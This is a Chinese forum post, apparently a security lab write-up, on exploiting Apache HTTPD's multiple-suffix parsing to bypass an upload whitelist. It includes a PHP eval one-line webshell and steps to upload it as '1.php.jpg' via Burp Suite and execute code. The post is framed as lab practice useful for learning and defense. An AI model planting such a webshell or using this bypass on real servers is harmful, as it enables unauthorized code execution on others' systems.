村长 发表于 2022-11-14 08:23:15

【NB】apache hppd多后缀解析漏洞实验


Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。比如,
如下配置文件:AddType text/html .html、AddLanguage zh-CN .cn,其给.html
后缀增加了 media-type,值为 text/html;给.cn 后缀增加了语言,值为 zh-CN。
此时,如果用户请求文件 index.cn.html,他将返回一个中文的 html 页面。以上
就是 Apache 多后缀的特性。如果运维人员给.php 后缀增加了处理器:
AddHandler application/x-httpd-php .php,那么,在有多个后缀的情况下,只
要一个文件含有.php 后缀的文件即将被识别成 PHP 文件,没必要是最后一个后缀。
利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞

开始实验

1.1 启动后 Apache 运行在 http://192.168.1.254。
http://cdn.u1.huluxia.com/g4/M03/72/81/rBAAdmLxIMOAZw1yAAA1wJrIvqs885.png
1.2 输入命令 vim 1.php,创建一个 php 文件,把<?php @eval($_POST['a']);?>输入 php
文件中。
http://cdn.u1.huluxia.com/g4/M03/72/81/rBAAdmLxIMSALBJjAACHTMR05SA349.png
1.3 设置浏览器代码,并开启 BurpSuite。
http://cdn.u1.huluxia.com/g4/M03/72/81/rBAAdmLxIMSAVNGDAAEtzEOBYTM957.png
1.4 点击 Submit 按钮,上传 1.php 的一句话木马文件,并用 BurpSuite 进行抓包拦截。
http://cdn.u1.huluxia.com/g4/M03/72/81/rBAAdmLxIMWAHVu-AAF4jvG2CYo559.png
1.5 把抓来的包,发到 Repeate 模板,并设置 Intercept is off。
http://cdn.u1.huluxia.com/g4/M03/72/81/rBAAdmLxIMaANBwoAAE4QISda0A365.png
1.6 点击 send 发送,发现被拦截。
http://cdn.u1.huluxia.com/g4/M03/72/81/rBAAdmLxIMaAPL3KAAMmfcD7tWA233.png
1.7 利用多后缀解析的漏洞,修改文件后缀名:.php.jpg 成功,并返回文件的路径。
http://cdn.u1.huluxia.com/g4/M03/72/81/rBAAdmLxIMiAD-_3AAIwsyuE1BE923.png
1.8 访问 http://192.168.1.254/uploadfiles/1.php.jpg,右键选择 Inspect Element(Q),
找到 HackBar 工具,在框中输入地址,点击 Post data,然后在下方栏中输入
a=phpinfo();。

1.9 点击 Execute 即可成功得到 phpinfo 页面。

注意 为了避免法律上的纠纷,非必要情况下,不要用webshell来进行测试,如有必要还是采用phpinfo来测试
页: [1]
查看完整版本: 【NB】apache hppd多后缀解析漏洞实验

村长黑科技是专业提供项目资源的服务的村长黑科技平台,如合购网赚项目、引流推广软件、软件程序开发等项目就选村长黑科
技平台参与或发布项目定制各种软件就来村长黑科技平台

本站中所有被研究的素材与信息全部来源于互联网,版权争议与本站无关。本站所发布的任何软件的破解分析文章、破解分析视频、补丁、注册机和注册信息,

仅限用于学习和研究软件安全的目的。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。学习破解分析技术是为了更好的完善软件可能存在的不安全因素,提升软件安全意识。所以您如果喜欢某程序,

请购买注册正版软件,获得正版优质服务!不允许将上述内容私自传播、销售或者其他任何非法用途!否则,产生任何法律责任,一切后果请用户自负,与本网站无关!如有侵权或非法用途请举报!请发送到邮箱:cxphj8@foxmail.com

《意见反馈》或《截图指定页面备注》发送到邮件,收到后24小时内删除,禁止用户学习使用关掉用户【学习使用权】!